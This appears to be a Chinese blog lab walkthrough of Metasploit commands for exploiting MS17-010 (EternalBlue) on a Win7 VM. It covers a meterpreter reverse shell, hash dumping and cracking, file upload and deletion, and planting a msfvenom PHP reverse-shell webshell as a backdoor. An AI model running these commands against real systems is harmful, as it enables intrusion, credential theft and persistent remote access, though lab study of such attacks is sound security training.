摘要:漏洞利用漏洞利用安裝虛擬機(jī),實(shí)現(xiàn)利用實(shí)現(xiàn)對(duì)其主機(jī)開始滲透,查看該主機(jī)信息,打開遠(yuǎn)程桌面,抓取用戶名和密碼并破譯,創(chuàng)建一個(gè)文件,實(shí)現(xiàn)上傳,下載,刪除。
1.安裝虛擬機(jī)win7 x64,實(shí)現(xiàn)利用ms17-010實(shí)現(xiàn)對(duì)其win7 x64主機(jī)開始滲透,查看該主機(jī)信息,打開遠(yuǎn)程桌面,抓取用戶名和密碼并破譯,創(chuàng)建一個(gè) : 70zsz.txt文件,實(shí)現(xiàn)上傳,下載,刪除。
首先啟動(dòng)win7 x64虛擬機(jī),查看IP地址為192.168.70.139,如下如圖所示:
在win7 x64上搭建wamp網(wǎng)站服務(wù)器從上到下依次安裝軟件,如下如所示:
安裝成功后通過瀏覽器訪問192.168.70.139查看是否能正常訪問該網(wǎng)站,如下圖所示:
Ms17-010漏洞的利用
接下來打開kali實(shí)現(xiàn)利用ms17-010漏洞,實(shí)現(xiàn)對(duì)其win7 x64主機(jī)進(jìn)行滲透,首先使用scanner下掃描模塊掃描目標(biāo)主機(jī)是否存在ms17-010的漏洞,如下圖所示:
在kali中輸入以下命令:
命令:
msfconsole
命令:search ms17-010
>use auxiliary/scanner/smb/smb_ms17-010>set RHOSTS 192.168.70.139>run
確認(rèn)目標(biāo)機(jī)器的操作系統(tǒng)及存在漏洞之后便可以進(jìn)行漏洞攻擊了,輸入命令use exploit/windows/smb/ms17_010_eternalblue
,調(diào)用exploit下的ms17_010_eternalblue模塊,并輸入命令show payloads
查看可用的payload,如下圖所示:
輸入命令set payload windows/x64/meterpreter/reverse_tcp
設(shè)置payload,并輸入命令show options
查看參數(shù)配置,如下圖所示,需要配置的參數(shù)為RHOST和LHOST
輸入命令set RHOST 192.168.70.139
配置目標(biāo)機(jī)器的IP地址,輸入命令set LHOST 192.168.70.134
配置kali本地的IP地址,配置完成后輸入命令show options
檢查參數(shù),如下圖所示:
參數(shù)配置檢查無誤后,輸入命令run
開始攻擊,并且返回一個(gè)meterptrter會(huì)話說明已經(jīng)攻擊成功了,如下圖所示:
后滲透攻擊:信息收集
進(jìn)程遷移:例如攻擊者利用瀏覽器漏洞攻陷了目標(biāo)主機(jī),但攻擊滲透后的瀏覽器有可能被用戶關(guān)閉,此shell是非常脆弱的,所以獲取shell后的第一步就是移動(dòng)這個(gè)shell,將它和目標(biāo)主機(jī)中一個(gè)穩(wěn)定的進(jìn)程綁定在一起。
例如:輸入ps
命令獲取目標(biāo)主機(jī)正在運(yùn)行的進(jìn)程,如下圖所示:
輸入命令getpid
查看meterperter shell的進(jìn)程號(hào)為2280,如下圖所示:
我們可用使用自動(dòng)遷移進(jìn)程命令,系統(tǒng)會(huì)自動(dòng)尋找合適的進(jìn)程然后進(jìn)行遷移,輸入自動(dòng)遷移命令run post/windows/manage/migrate
,執(zhí)行命令后此時(shí)將原先的2280進(jìn)程號(hào)修改為1244,如圖所示:
收集系統(tǒng)信息:獲取了穩(wěn)定進(jìn)程之后開始收集系統(tǒng)信息,輸入命令sysinfo
查看目標(biāo)主機(jī)的系統(tǒng)信息,如下圖所示:
捕獲桌面輸入命令screenshot
抓取目標(biāo)主機(jī)的屏幕截圖路徑為/root/bPgQxuoB,jpeg
文件,如下圖所示:
輸入shell
命令進(jìn)入目標(biāo)機(jī)器shell,如下圖所示:
在shell輸入exit
可用停止shell會(huì)話并返回meterperter中,如下圖所示:
上傳文件命令upload
,在kali虛擬機(jī)root目錄下存在70zsz.txt文件,其內(nèi)容為I‘m is 70 zsz!,輸入命令upload /root/70zsz.txt c://
,此文件上傳到目標(biāo)機(jī)器c:/目錄下,如下圖所示:
輸入shell進(jìn)入Windows shell查看從c:/目錄下是否有剛剛我們上傳的70zsz.txt文件,如下圖所示:
下載文件命令download
,輸入命令download c:/70zsz.txt/root/download將目標(biāo)機(jī)器c:/下的70zsz.txt下載到本機(jī)/root/download中,如下圖所示:
輸入命令rm c://70zsz.txt
將目標(biāo)機(jī)器c:/下的70zsz.txt刪除,如下圖所示:
后滲透攻擊:Hash攻擊
使用Hashdump抓取密碼,HashdumpMeterpreter腳本可用從目標(biāo)機(jī)器中提取Hash值,破解Hash值可獲得登錄密碼。計(jì)算機(jī)中的每個(gè)賬號(hào)的用戶名和密碼都存儲(chǔ)在sam中,當(dāng)計(jì)算機(jī)運(yùn)行時(shí),該文件對(duì)所有賬號(hào)進(jìn)行鎖定,想要訪問就必須有“系統(tǒng)級(jí)“的賬號(hào)。
在meterpreter shell提示符下輸入hashdump命令,將導(dǎo)出sam數(shù)據(jù)庫(kù)中Hash,如下圖所示:
從圖中我們可用看出,返回了三個(gè)用戶賬號(hào),分別為Administrator,Guest,zsz,數(shù)據(jù)輸出的格式為用戶名:SID:LM哈希:NTLM哈希:::,在zsz賬戶中NTLM哈希進(jìn)行破解,使用在線破解網(wǎng)站對(duì)其進(jìn)行破解,如https://www.cmd5.com/,可以看到結(jié)果正是為zsz賬戶的密碼:123456
后滲透攻擊:后門
Meterpreter后門:在Meterpreter中,有一個(gè)名為PGP Meterpreter的payload,利用這個(gè)模塊可創(chuàng)建具有Meterpreter功能的PHP WebShell,在攻擊中使用Metasploit PHP Shell步驟如下:
1.使用msfvenom創(chuàng)建一個(gè)webshell.php
2.上傳webshell.php到目標(biāo)服務(wù)器
3.運(yùn)行Metasploit multi-handler開始監(jiān)聽
4.訪問webshell.php頁面
5.獲得反彈Metasploit shell
首先通過Metasploit的msfvenom攻擊制作PHP Meterpreter,輸入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php
,如下圖所示:
因?yàn)槟繕?biāo)主機(jī)使用了wampserver,因此得知需要上傳070zsz.php文件至目標(biāo)主機(jī)中c:/wamp64/www中,如下圖所示:
輸入exit
返回meterpreter,使用上傳命令upload/root/070zsz.php c://wamp64//www
中,如下圖所示:
輸入exit回到msf,輸入如下命令設(shè)置監(jiān)聽,如下圖所示:
>exit>use exploit/multi/handler>set payload php/meterpreter/reverse_tcp>set LHOST 192.168.70.134>run
打開瀏覽器,訪問目標(biāo)機(jī)器服務(wù)器中070zsz.php文件,即訪問http://192.168.70.139/070zsz.php ,結(jié)果可以看到服務(wù)端反彈shell成功如下圖所示:
文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請(qǐng)注明本文地址:http://specialneedsforspecialkids.com/yun/124528.html
閱讀 2627·2021-11-23 09:51
閱讀 860·2021-09-24 10:37
閱讀 3611·2021-09-02 15:15
閱讀 1962·2019-08-30 13:03
閱讀 1881·2019-08-29 15:41
閱讀 2624·2019-08-29 14:12
閱讀 1423·2019-08-29 11:19
閱讀 3300·2019-08-26 13:39